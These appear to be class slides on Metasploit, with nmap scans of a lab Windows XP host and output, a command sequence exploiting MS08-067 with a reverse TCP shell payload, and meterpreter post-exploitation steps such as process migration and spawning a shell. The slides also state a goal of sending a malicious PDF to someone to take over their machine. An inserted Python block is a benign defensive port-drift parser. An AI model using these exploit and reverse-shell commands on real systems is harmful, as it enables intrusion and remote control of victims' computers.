Download - Metasploit2
• PERFORM A PORT SCAN
• EXPLOIT AN APACHE SERVER AND TAKE CONTROL OF THE MACHINE RUNNING IT
• GENERATE A MALICIOUS PDF (VIRUS), SEND IT TO SOMEONE AND TAKE CONTROL OF THAT PERSON'S MACHINE =P
• ONE MORE HACK IF THERE IS TIME
root@bt:~# nmap -sS -Pn ip
• -sS <= Determines whether a port is open (TCP)
• -Pn <= Tells nmap not to use ping to determine whether a system is up (useful when ICMP packets are not allowed on the network)
root@bt:~# nmap -sS -Pn 172.16.32.131
Nmap scan report for 172.16.32.131
Host is up (0.00057s latency).
Not shown: 990 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
25/tcp   open  smtp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1433/tcp open  ms-sql-s
3389/tcp open  ms-term-serv
Nmap done: 1 IP address (1 host up) scanned in 14.34 seconds
root@bt:~# nmap -Pn -sS -A 172.16.32.131
Nmap scan report for 172.16.32.131
Host is up (0.0035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
777/tcp  open  unknown
1138/tcp open  msrpc        Microsoft Windows RPC
1433/tcp open  ms-sql-s     Microsoft SQL Server 2005 9.00.1399; RTM
Device type: general purpose
Running: Microsoft Windows XP|2003
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
Network Distance: 1 hop
Service Info: OS: Windows
Host script results:
|_nbstat: NetBIOS name: V-MAC-XP, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:c9:38:4c (VMware)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Name: WORKGROUP\V-MAC-XP
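An added example, not part of the original slides: a small parser for the nmap port table shown above, used the way a defender would, to compare a host's open ports against an earlier scan and surface drift. The function names are hypothetical, and treating the first scan as an approved baseline is an assumption of this example.

```python
import re

# One row of the PORT table in nmap's normal output ("445/tcp open microsoft-ds ...").
PORT_ROW = re.compile(
    r"^(?P<port>\d{1,5})/(?P<proto>tcp|udp)\s+(?P<state>\S+)"
    r"\s+(?P<service>\S+)(?:\s+(?P<version>.+))?$"
)

def parse_ports(report):
    """Map (port, proto) -> state/service/version for one host report."""
    ports = {}
    for line in report.splitlines():
        m = PORT_ROW.match(line.strip())
        if m is None:
            continue  # table header, OS guess, "|_script" output, summary lines
        ports[(int(m["port"]), m["proto"])] = {
            "state": m["state"], "service": m["service"],
            "version": m["version"] or "",
        }
    return ports

def open_port_drift(baseline, current):
    """Return (newly_open, no_longer_open) between two parsed reports."""
    was = {k for k, v in baseline.items() if v["state"] == "open"}
    now = {k for k, v in current.items() if v["state"] == "open"}
    return sorted(now - was), sorted(was - now)

# Port tables from the two scans on the slides; scan 1 as baseline is an assumption.
SCAN_1 = """PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1433/tcp open ms-sql-s
3389/tcp open ms-term-serv
"""
SCAN_2 = """PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
777/tcp open unknown
1138/tcp open msrpc Microsoft Windows RPC
1433/tcp open ms-sql-s Microsoft SQL Server 2005 9.00.1399; RTM
|_smbv2-enabled: Server doesn't support SMBv2 protocol
"""
NEWLY_OPEN, NO_LONGER_OPEN = open_port_drift(parse_ports(SCAN_1), parse_ports(SCAN_2))
```

Ports that appear in `NEWLY_OPEN` without a matching change record are the ones to investigate first.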
• msf> show exploits | grep exploit
• msf> show auxiliary
• msf> search mysql
• msf exploit(ms08_067_netapi) > show targets
• msf exploit(ms08_067_netapi) > info
• msf> use windows/smb/ms08_067_netapi
• msf exploit(ms08_067_netapi) > back
• msf> show options
• msf > show payloads
• msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
• msf exploit(ms08_067_netapi) > set RHOST ip
• msf exploit(ms08_067_netapi) > set LHOST ip
• msf exploit(ms08_067_netapi) > set LPORT port
• msf exploit(ms08_067_netapi) > exploit
• meterpreter > screenshot
• meterpreter > sysinfo
• meterpreter > ps
• meterpreter > migrate 1668
• meterpreter > getuid
• meterpreter > shell